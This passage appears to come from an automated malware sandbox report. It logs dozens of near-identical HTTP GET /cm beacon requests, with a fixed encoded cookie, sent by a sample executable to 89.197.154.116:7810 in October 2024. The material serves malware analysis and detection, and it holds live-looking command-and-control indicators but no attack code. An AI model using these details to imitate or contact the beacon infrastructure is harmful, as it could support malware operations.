                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                79192.168.2.45008389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:27.707072973 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                80192.168.2.45008489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:29.410497904 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                81192.168.2.45008589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:31.275403023 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                82192.168.2.45008689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:32.988095045 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                83192.168.2.45008789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:34.695804119 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                84192.168.2.45008889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:36.399215937 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                85192.168.2.45008989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:38.119827032 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                86192.168.2.45009089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:40.036904097 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                87192.168.2.45009189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:41.723145008 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                88192.168.2.45009289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:43.504689932 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                89192.168.2.45009389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:45.223099947 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                90192.168.2.45009489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:46.958383083 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                91192.168.2.45009589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:48.788067102 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                92192.168.2.45009689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:50.509876966 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                93192.168.2.45009789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:52.239969015 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                94192.168.2.45009889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:53.963825941 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                95192.168.2.45009989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:55.645150900 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                96192.168.2.45010089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:57.348505020 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                97192.168.2.45010189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:59.410825014 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                98192.168.2.45010289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:01.490750074 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                99192.168.2.45010389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:03.364001989 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                100192.168.2.45010489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:05.083220959 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                101192.168.2.45010589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:06.803975105 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                102192.168.2.45010689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:09.477650881 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                103192.168.2.45010789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:11.161505938 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                104192.168.2.45010889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:12.895720005 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                105192.168.2.45010989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:14.584964991 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                106192.168.2.45011089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:16.319725990 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                107192.168.2.45011189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:20.442635059 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                108192.168.2.45011289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:22.157046080 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                109192.168.2.45011389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:23.849575996 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                110192.168.2.45011489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:25.551630020 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                111192.168.2.45011589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:27.241765976 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
